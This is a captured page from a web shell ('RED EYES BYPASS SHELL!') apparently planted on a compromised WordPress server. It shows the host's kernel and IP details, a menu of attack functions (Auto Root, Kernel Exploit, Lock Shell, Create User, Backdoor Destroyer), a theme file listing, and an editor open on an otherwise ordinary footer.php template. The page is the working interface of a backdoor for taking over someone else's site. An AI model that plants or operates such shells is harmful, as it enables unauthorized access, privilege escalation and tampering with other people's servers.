Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
vw-landing-page /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-template
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
404.php
1.25
KB
-rwxr-xr-x
archive.php
7.89
KB
-rwxr-xr-x
comments.php
2.42
KB
-rwxr-xr-x
footer.php
4.3
KB
-rwxr-xr-x
functions.php
24.23
KB
-rwxr-xr-x
header.php
1.48
KB
-rwxr-xr-x
image.php
8.08
KB
-rwxr-xr-x
index.php
6.77
KB
-rwxr-xr-x
inline-style.php
49.35
KB
-rwxr-xr-x
license.txt
34.32
KB
-rwxr-xr-x
no-results.php
1.18
KB
-rwxr-xr-x
page.php
3.39
KB
-rwxr-xr-x
readme.txt
22.42
KB
-rwxr-xr-x
rtl.css
38.31
KB
-rwxr-xr-x
screenshot.png
195.77
KB
-rwxr-xr-x
search.php
10.12
KB
-rwxr-xr-x
searchform.php
658
B
-rwxr-xr-x
sidebar.php
993
B
-rwxr-xr-x
single.php
9.68
KB
-rwxr-xr-x
style.css
52.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php /** * The template for displaying the footer. * * Contains the closing of the #content div and all content after * * @package VW Landing Page */ ?> <footer role="contentinfo"> <?php if (get_theme_mod('vw_landing_page_footer_hide_show', true)){ ?> <div id="footer" class="copyright-wrapper"> <div class="container"> <?php $count = 0; if ( is_active_sidebar( 'footer-1' ) ) { $count++; } if ( is_active_sidebar( 'footer-2' ) ) { $count++; } if ( is_active_sidebar( 'footer-3' ) ) { $count++; } if ( is_active_sidebar( 'footer-4' ) ) { $count++; } // $count == 0 none if ( $count == 1 ) { $colmd = 'col-md-12 col-sm-12'; } elseif ( $count == 2 ) { $colmd = 'col-md-6 col-sm-6'; } elseif ( $count == 3 ) { $colmd = 'col-md-4 col-sm-4'; } else { $colmd = 'col-md-3 col-sm-3'; } ?> <div class="row"> <div class="<?php if ( !is_active_sidebar( 'footer-1' ) ){ echo "footer_hide"; }else{ echo "$colmd"; } ?> col-xs-12 footer-block"> <?php dynamic_sidebar('footer-1'); ?> </div> <div class="<?php if ( is_active_sidebar( 'footer-2' ) ){ echo "$colmd"; }else{ echo "footer_hide"; } ?> col-xs-12 footer-block"> <?php dynamic_sidebar('footer-2'); ?> </div> <div class="<?php if ( is_active_sidebar( 'footer-3' ) ){ echo "$colmd"; }else{ echo "footer_hide"; } ?> col-xs-12 col-xs-12 footer-block"> <?php dynamic_sidebar('footer-3'); ?> </div> <div class="<?php if ( !is_active_sidebar( 'footer-4' ) ){ echo "footer_hide"; }else{ echo "$colmd"; } ?> col-xs-12 footer-block"> <?php dynamic_sidebar('footer-4'); ?> </div> </div> </div> </div> <?php }?> <?php if (get_theme_mod('vw_landing_page_copyright_hide_show', true)) {?> <div id="footer-2"> <div class="copyright container"> <p><?php vw_landing_page_credit(); ?> <?php echo esc_html(get_theme_mod('vw_landing_page_footer_text',__('By VWThemes','vw-landing-page'))); ?></p> <?php if(get_theme_mod('vw_landing_page_footer_icon',false) != false) {?> <?php dynamic_sidebar('footer-icon'); ?> <?php }?> <?php if( get_theme_mod( 'vw_landing_page_hide_show_scroll',true) == 1 || get_theme_mod( 'vw_landing_page_resp_scroll_top_hide_show',true) == 1) { ?> <?php $vw_landing_page_theme_lay = get_theme_mod( 'vw_landing_page_scroll_top_alignment','Right'); if($vw_landing_page_theme_lay == 'Left'){ ?> <a href="#" class="scrollup left"><i class="<?php echo esc_attr(get_theme_mod('vw_landing_page_scroll_top_icon','fas fa-long-arrow-alt-up')); ?>"></i><span class="screen-reader-text"><?php esc_html_e( 'Scroll Up', 'vw-landing-page' ); ?></span></a> <?php }else if($vw_landing_page_theme_lay == 'Center'){ ?> <a href="#" class="scrollup center"><i class="<?php echo esc_attr(get_theme_mod('vw_landing_page_scroll_top_icon','fas fa-long-arrow-alt-up')); ?>"></i><span class="screen-reader-text"><?php esc_html_e( 'Scroll Up', 'vw-landing-page' ); ?></span></a> <?php }else{ ?> <a href="#" class="scrollup"><i class="<?php echo esc_attr(get_theme_mod('vw_landing_page_scroll_top_icon','fas fa-long-arrow-alt-up')); ?>"></i><span class="screen-reader-text"><?php esc_html_e( 'Scroll Up', 'vw-landing-page' ); ?></span></a> <?php }?> <?php }?> </div> <div class="clear"></div> </div> <?php }?> </footer> <?php wp_footer(); ?> </body> </html>
Close